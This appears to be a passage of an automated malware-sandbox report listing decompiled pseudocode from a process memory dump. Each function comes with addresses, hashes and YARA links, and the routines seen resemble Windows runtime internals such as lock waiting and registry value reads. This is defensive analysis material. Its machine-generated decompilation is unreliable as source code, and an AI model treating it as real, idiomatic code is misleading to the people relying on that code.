						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04469520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0445E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0447DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4516901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4516901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04469980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E044695D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04447D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04447D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E044A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E044BFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4515350;
							if(_t109 != 0x4515350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E044BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E044B5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































            0x04422d8a
            0x04422d8a
            0x04422d92
            0x04422d96
            0x04422d9e
            0x04422da0
            0x04422da3
            0x04422da5
            0x04422da8
            0x04422dab
            0x04422db2
            0x0447f9aa
            0x0447f9ab
            0x0447f9ae
            0x0447f9ae
            0x04422db8
            0x04422dc2
            0x0447f9b9
            0x0447f9be
            0x0447f9bf
            0x0447f9bf
            0x04422dcf
            0x0447f9c9
            0x04422dd5
            0x04422dd5
            0x04422dd5
            0x04422dde
            0x04422de1
            0x04422e70
            0x04422e72
            0x04422e72
            0x04422de7
            0x04422deb
            0x04422e7c
            0x04422e83
            0x04422e85
            0x04422e8b
            0x04422e8d
            0x04422e92
            0x04422e92
            0x04422e85
            0x04422df1
            0x04422df7
            0x04422df9
            0x04422df9
            0x04422dfc
            0x04422dff
            0x04422e02
            0x00000000
            0x04422e05
            0x04422e0c
            0x0447f9d9
            0x04422e12
            0x04422e12
            0x04422e12
            0x04422e1a
            0x0447f9e3
            0x0447f9e9
            0x0447f9f0
            0x0447f9f6
            0x0447f9f8
            0x0447f9f8
            0x0447f9f0
            0x04422e23
            0x0447fa02
            0x0447fa03
            0x0447fa05
            0x0447fa06
            0x00000000
            0x04422e29
            0x04422e29
            0x04422e2e
            0x04422e34
            0x04422e3e
            0x00000000
            0x00000000
            0x04422e44
            0x04422e47
            0x04422e4d
            0x00000000
            0x00000000
            0x04422e4f
            0x04422e54
            0x00000000
            0x00000000
            0x04422e5a
            0x04422e5f
            0x04422e9a
            0x04422ea4
            0x04422ea5
            0x04422ea8
            0x04422eaf
            0x04422eb2
            0x04422eb5
            0x0447fae9
            0x0447faeb
            0x0447faed
            0x0447faef
            0x0447faf7
            0x0447faf8
            0x0447fafd
            0x0447faff
            0x0447fb04
            0x0447fb04
            0x0447faff
            0x04422ec0
            0x04422ec4
            0x04422ec6
            0x04422ec8
            0x0447fb14
            0x0447fb18
            0x0447fb1e
            0x0447fb21
            0x0447fb21
            0x04422ece
            0x04422ece
            0x04422ece
            0x04422ed7
            0x04422e61
            0x04422e63
            0x0447fa6b
            0x0447fa71
            0x0447fa76
            0x0447fa78
            0x0447fa8a
            0x0447fa7a
            0x0447fa83
            0x0447fa83
            0x0447fa8f
            0x0447fa91
            0x0447fa97
            0x0447fa9d
            0x0447faa4
            0x0447faaa
            0x0447faaf
            0x0447fab1
            0x0447fac3
            0x0447fab3
            0x0447fabc
            0x0447fabc
            0x0447fac8
            0x0447facb
            0x0447fadf
            0x0447fadf
            0x0447facb
            0x0447faa4
            0x0447fa91
            0x04422e6f
            0x04422e6f
            0x04422e5f
            0x0447fa13
            0x0447fa15
            0x0447fa17
            0x0447fa1f
            0x0447fa21
            0x0447fa22
            0x0447fa25
            0x0447fa28
            0x0447fa2f
            0x0447fa2f
            0x0447fa2a
            0x0447fa2a
            0x0447fa2a
            0x0447fa31
            0x0447fa34
            0x0447fa36
            0x0447fa3c
            0x0447fa3e
            0x0447fa41
            0x0447fa43
            0x0447fa45
            0x0447fa45
            0x0447fa41
            0x0447fa3c
            0x0447fa4a
            0x0447fa4f
            0x0447fa51
            0x0447fa53
            0x0447fa56
            0x0447fa5b
            0x0447fa5e
            0x00000000
            0x0447fa5e
            0x04422e23

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: RTL: Re-Waiting
            • API String ID: 0-316354757
            • Opcode ID: 9bf777e40fe76d8469b5340114d6df9696dcdeb8446ccea3294b54e16eb64a12
            • Instruction ID: aa92323e98f401393976cddce5f455dcabe446cf59e5b369ff86c25e9ae78ecb
            • Opcode Fuzzy Hash: 9bf777e40fe76d8469b5340114d6df9696dcdeb8446ccea3294b54e16eb64a12
            • Instruction Fuzzy Hash: 6B612070A00214ABEF31DF68C940BBBB7A1FB44328F5406ABD811973D1D7B4B906A791
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
            Download Yara Rule
            C-Code - Quality: 80%
            			E044F0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E044EFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E044F1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04469730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E044EA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E044EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4518b04 >> 0x14) + (_v44 -  *0x4518b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04447D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E044E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04447D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E044DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4518724 & 0x00000008) != 0) {
						E044E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E044F15B5(0x4518ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























            0x044f0eb7
            0x044f0eb9
            0x044f0ec0
            0x044f0ec2
            0x044f0ecd
            0x044f105b
            0x044f105b
            0x044f1061
            0x044f1066
            0x044f1066
            0x044f106b
            0x044f1073
            0x044f1073
            0x044f0ed3
            0x044f0ed6
            0x044f0edc
            0x044f0ee0
            0x044f0ee7
            0x044f0ef0
            0x044f0ef5
            0x044f0efa
            0x044f0efc
            0x044f0efd
            0x044f0f03
            0x044f0f04
            0x044f0f06
            0x044f0f07
            0x044f0f09
            0x044f0f0e
            0x044f0f14
            0x044f0f23
            0x044f0f2d
            0x044f0f34
            0x044f0f34
            0x044f0f14
            0x044f0f52
            0x00000000
            0x00000000
            0x044f0f58
            0x044f0f73
            0x044f0f74
            0x044f0f79
            0x044f0f7d
            0x044f0f80
            0x044f0f86
            0x044f0fab
            0x044f0fb5
            0x044f0fc6
            0x044f0fd1
            0x044f0fe3
            0x044f0fd3
            0x044f0fdc
            0x044f0fdc
            0x044f0feb
            0x044f1009
            0x044f1009
            0x044f1015
            0x044f1027
            0x044f1017
            0x044f1020
            0x044f1020
            0x044f102f
            0x044f103c
            0x044f103c
            0x044f1048
            0x044f1050
            0x044f1050
            0x044f1055
            0x00000000
            0x044f1055
            0x044f0f88
            0x044f0f9e
            0x044f0fa2
            0x044f0fa9
            0x00000000
            0x00000000
            0x00000000
            0x044f0fa9
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: `
            • API String ID: 0-2679148245
            • Opcode ID: e9908ac1f3dce8b95ebf5edafc1e988f1560626dd3e7bc699b22524e11c14230
            • Instruction ID: 274def19c25fbc1e7f2aea8fa45b24b0914cfd78cc697dda52035676d4c2a665
            • Opcode Fuzzy Hash: e9908ac1f3dce8b95ebf5edafc1e988f1560626dd3e7bc699b22524e11c14230
            • Instruction Fuzzy Hash: A751AE702043419FEB24DF29D984B2BB7E5EBC4304F04492EFA8697692D670FC06CB62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
            Download Yara Rule
            C-Code - Quality: 76%
            			E0445F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04444120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04469830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04469990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E044695D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x172cd01a
							_t109 = L04444620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000172c
								E0446F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000172c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E044695D0();
										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























            0x0445f0d3
            0x0445f0d9
            0x0445f0e0
            0x0445f0e7
            0x0445f0f2
            0x0445f0f4
            0x0445f0f8
            0x0445f100
            0x0445f108
            0x0445f10d
            0x0445f115
            0x0445f116
            0x0445f11f
            0x0445f123
            0x0445f124
            0x0445f12c
            0x0445f130
            0x0445f134
            0x0445f13d
            0x0445f144
            0x0445f14b
            0x0445f152
            0x0449bab0
            0x0449bab0
            0x0445f158
            0x0445f158
            0x0445f15a
            0x0445f160
            0x0445f165
            0x0445f166
            0x0445f16f
            0x0445f173
            0x0449baa7
            0x0449baa7
            0x0449baab
            0x00000000
            0x0445f179
            0x0445f179
            0x0445f18d
            0x0445f191
            0x0449baa2
            0x00000000
            0x0445f197
            0x0445f19b
            0x0445f1a2
            0x0445f1a9
            0x0445f1af
            0x0445f1b2
            0x0445f1b6
            0x0445f1b9
            0x0445f1c0
            0x0445f1c4
            0x0445f1d8
            0x0445f1df
            0x0445f1e3
            0x0445f1e6
            0x0445f1eb
            0x0445f1ee
            0x0445f1f4
            0x0445f20f
            0x0449bab7
            0x0449babb
            0x0449bacc
            0x0449bad1
            0x0445f215
            0x0445f218
            0x0445f226
            0x0445f22b
            0x00000000
            0x0445f22b
            0x0445f1f6
            0x0445f1f6
            0x0445f1f9
            0x0445f1fb
            0x0445f1fb
            0x0445f1f4
            0x0445f191
            0x0445f173
            0x0445f152
            0x0445f203

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction ID: 2b539e16fbc056f0e9b921fdf5656726c8932e3891a8558262d9c7bea1660408
            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction Fuzzy Hash: B3518E715047109FD720DF19C840A67BBF9FF88714F00892EF99597661E7B4E904CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044A3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
            Download Yara Rule
            C-Code - Quality: 75%
            			E044A3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x451d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04460BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E044A3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0446FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E044A3540;
						E0446FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0447DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E044B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E044697C0();
					}
					return E0446B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E044A3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E044A3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0446FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04469650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E044A3787(_a4,  &_v352, _t80);
						}
					}
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E044695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































            0x044a3552
            0x044a355a
            0x044a355d
            0x044a3566
            0x044a3567
            0x044a357e
            0x044a358f
            0x044a35a1
            0x044a35a5
            0x044a366b
            0x044a366b
            0x044a366d
            0x044a3672
            0x044a3679
            0x044a3685
            0x044a368d
            0x044a369d
            0x044a36a7
            0x044a36b8
            0x044a36c6
            0x044a36c7
            0x044a36dc
            0x044a36e1
            0x044a36e7
            0x044a36e9
            0x044a36e9
            0x044a3703
            0x044a3703
            0x044a35b5
            0x044a35c0
            0x044a35c4
            0x00000000
            0x00000000
            0x044a35ca
            0x044a35d7
            0x044a35e2
            0x044a35e6
            0x044a35e8
            0x044a35f5
            0x044a35fa
            0x044a3603
            0x044a3604
            0x044a3609
            0x044a360a
            0x044a3612
            0x044a3613
            0x044a361e
            0x044a3622
            0x044a3628
            0x044a362f
            0x044a362f
            0x044a3636
            0x044a3638
            0x044a363b
            0x044a3642
            0x044a3642
            0x044a3636
            0x044a3657
            0x044a3657
            0x044a365c
            0x044a3662
            0x044a3669
            0x00000000
            0x00000000
            0x00000000
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID: BinaryHash
            • API String ID: 2994545307-2202222882
            • Opcode ID: 75b69c4bc150be25e15b92e40504d9c11951bf47852ce6930fb6d39b122a950c
            • Instruction ID: 7bceda9795bca22d3f5b92d7d86519ee759b5abbf39e3815154a4eed917f3ef3
            • Opcode Fuzzy Hash: 75b69c4bc150be25e15b92e40504d9c11951bf47852ce6930fb6d39b122a950c
            • Instruction Fuzzy Hash: 1B4138F1D0052C9BEF21DE51CC80FDEB77C9B54718F00459AEA09A7241EB30AE988F95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044A3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E044A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04469650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04444620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04469650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















            0x044a3893
            0x044a3896
            0x044a3899
            0x044a389f
            0x044a38a0
            0x044a38a4
            0x044a38a9
            0x044a38ac
            0x044a38ad
            0x044a38ae
            0x044a38af
            0x044a38b1
            0x044a38b4
            0x044a38bb
            0x044a38bc
            0x044a38bd
            0x044a38c4
            0x044a38c8
            0x044a38ca
            0x044a38ca
            0x044a38d5
            0x044a393e
            0x044a3940
            0x044a3942
            0x044a3952
            0x044a3954
            0x044a3961
            0x044a3961
            0x044a3967
            0x044a396e
            0x044a396e
            0x044a3947
            0x044a394c
            0x00000000
            0x044a394c
            0x044a38ea
            0x044a38ee
            0x044a38f8
            0x044a38f9
            0x044a38ff
            0x044a3900
            0x044a3902
            0x044a3903
            0x044a390b
            0x044a390f
            0x044a3950
            0x00000000
            0x044a3950
            0x044a3915
            0x044a391d
            0x044a391d
            0x044a3922
            0x044a3926
            0x00000000
            0x044a3928
            0x044a392b
            0x044a392b
            0x044a3935
            0x044a3937
            0x044a3937
            0x00000000
            0x044a3935
            0x044a3926
            0x044a38f0
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID: BinaryName
            • API String ID: 2994545307-215506332
            • Opcode ID: 0db4d5a707f77e8584039460b9ee794db803a5743db052f00ed40406963597c5
            • Instruction ID: e2ccf308a294dabcfd6a980ae52e81ddfa0c668ee02a6ef65278bcc8d58c02ad
            • Opcode Fuzzy Hash: 0db4d5a707f77e8584039460b9ee794db803a5743db052f00ed40406963597c5
            • Instruction Fuzzy Hash: B5313332900609AFEF25DE59C945E6BF7B8EB90B20F01412AEC04A7780E730BE14C7A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
            Download Yara Rule
            C-Code - Quality: 33%
            			E0445D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x451d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04444120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0446B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E044698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E044695D0();
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































            0x0445d29c
            0x0445d2a6
            0x0445d2b1
            0x0445d2b5
            0x0445d2b6
            0x0445d2bc
            0x0445d2bd
            0x0445d2be
            0x0445d2bf
            0x0445d2c2
            0x0445d2c4
            0x0445d2cc
            0x0445d384
            0x0445d34b
            0x0445d34f
            0x0445d350
            0x0445d351
            0x0445d35c
            0x0445d35c
            0x0445d2d6
            0x0445d2da
            0x0445d2e1
            0x0445d361
            0x0445d369
            0x0445d36d
            0x0445d2e3
            0x0445d2e3
            0x0445d2e3
            0x0445d2e5
            0x0445d2ed
            0x0445d2f5
            0x0445d2fa
            0x0445d302
            0x0445d303
            0x0445d30b
            0x0445d30f
            0x0445d313
            0x0445d318
            0x0445d31c
            0x0445d320
            0x0445d379
            0x0445d37d
            0x00000000
            0x00000000
            0x0449affe
            0x0449b001
            0x0449b011
            0x00000000
            0x0445d322
            0x0445d322
            0x0445d330
            0x0445d337
            0x0445d35d
            0x0445d339
            0x0445d33f
            0x0445d38c
            0x0445d38c
            0x0445d33f
            0x0445d349
